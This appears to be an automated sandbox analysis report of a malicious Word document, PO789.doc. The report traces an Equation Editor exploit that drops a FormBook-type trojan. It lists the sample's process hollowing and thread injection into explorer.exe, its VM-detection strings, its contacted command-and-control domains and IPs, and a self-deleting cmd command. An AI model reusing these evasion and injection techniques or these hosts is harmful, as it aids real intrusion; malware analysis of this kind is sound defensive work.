          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000985F0 NtCreateFile,7_2_000985F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000986A0 NtReadFile,7_2_000986A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_00098720 NtClose,7_2_00098720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_000987D0 NtAllocateVirtualMemory,7_2_000987D0
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
          Source: PO789.docVirustotal: Detection: 57%
          Source: PO789.docReversingLabs: Detection: 53%
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeProcess created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO789.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB31.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/9@6/5
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000003.421954083.0000000000540000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460764763.0000000000D20000.00000040.00000001.sdmp, medicomsh78694.exe, 00000005.00000003.422999608.00000000006A0000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: medicomsh78694.exe, 00000005.00000003.458755540.0000000002800000.00000004.00000001.sdmp, medicomsh78694.exe, 00000005.00000002.461556761.0000000002700000.00000040.00020000.sdmp, medicomsh78694.exe, 00000005.00000003.458361756.0000000002700000.00000004.00000001.sdmp
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: medicomzx[1].exe.2.dr, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: medicomsh78694.exe.2.dr, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | .Net Code: I_000001 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037AAA8 push eax; retn 0036h 4_2_0037AAA9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037EB30 push ebx; ret 4_2_0037EB31
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037ABC8 push esp; ret 4_2_0037ABC9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 4_2_0037B558 push eax; retf 0036h 4_2_0037B559
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041C940 push dword ptr [D38E3050h]; ret 5_2_0041C961
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00409BCE push edx; retf 5_2_00409BCF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00413FD9 push edx; ret 5_2_00413FDB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_0040B7F3 push ebp; iretd 5_2_0040B7F9
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_025FDFA1 push ecx; ret 7_2_025FDFB4
          Source: initial sample | Static PE information: section name: .text entropy: 7.16750619992
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: medicomsh78694.exe PID: 2824, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe TID: 2032 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_004088E0 rdtsc 5_2_004088E0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process information queried: ProcessInformation
          Source: explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.514374619.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.514300664.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.425259363.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: medicomsh78694.exe, 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00BC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00BC26F8
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026026F8 mov eax, dword ptr fs:[00000030h] 7_2_026026F8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.muzicalbox.com
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.13 80
          Source: C:\Windows\explorer.exe | Domain query: www.extraordinarymiracle.com
          Source: C:\Windows\explorer.exe | Domain query: www.realstakepool.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 109.94.209.123 80
          Source: C:\Windows\explorer.exe | Domain query: www.prestigiousuniforms.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: C40000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Memory written: C:\Users\user\AppData\Roaming\medicomsh78694.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe C:\Users\user\AppData\Roaming\medicomsh78694.exe
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Process created: C:\Users\user\AppData\Roaming\medicomsh78694.exe {path}
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.445207583.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.435031021.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.425787862.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.512334695.0000000000750000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Queries volume information: C:\Users\user\AppData\Roaming\medicomsh78694.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Techniques listed per tactic column (numbers in parentheses are the hit counts shown in the matrix cells):
          Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
          Execution: Shared Modules (1), Exploitation for Client Execution (13), At (Linux), At (Windows), Cron, Launchd, Scheduled Task
          Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
          Privilege Escalation: Process Injection (612), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
          Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (612), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (12)
          Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
          Discovery: Security Software Discovery (321), Process Discovery (2), Virtualization/Sandbox Evasion (31), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (113), Network Sniffing
          Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
          Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel (1), Ingress Tool Transfer (14), Non-Application Layer Protocol (3), Application Layer Protocol (123), Fallback Channels, Multiband Communication, Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 552782, Sample: PO789.doc, Startdate: 13/01/2022, Architecture: WINDOWS, Score: 100
          Top-level domain: www.danielkcarter.store
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures
          WINWORD.EXE started; dropped C:\Users\user\Desktop\~$PO789.doc (data) and ~WRF{828CF0EA-BCAC...1-FE0BC8A11CE4}.tmp (Composite)
          EQNEDT32.EXE started; contacted peak-tv.tk (2.58.149.41, ports 49167, 80, GBTCLOUDUS, Netherlands); dropped C:\Users\user\AppData\...\medicomsh78694.exe (PE32) and C:\Users\user\AppData\...\medicomzx[1].exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          medicomsh78694.exe started by EQNEDT32.EXE; signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
          medicomsh78694.exe (second instance) started by medicomsh78694.exe; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected into explorer.exe
          explorer.exe (injected); contacted www.realstakepool.com (91.195.240.13, ports 49172, 80, SEDO-ASDE, Germany) and shops.myshopify.com (23.227.38.74, ports 49168, 80, CLOUDFLARENETUS, Canada) plus 4 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit); started msdt.exe
          msdt.exe started by explorer.exe; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe
          cmd.exe started by msdt.exe

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
PO789.doc | 58% | Virustotal |
PO789.doc | 54% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\medicomsh78694.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe | 51% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\medicomsh78694.exe | 34% | Metadefender |
C:\Users\user\AppData\Roaming\medicomsh78694.exe | 51% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

Source | Detection | Scanner | Label
5.0.medicomsh78694.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.medicomsh78694.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.medicomsh78694.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.medicomsh78694.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

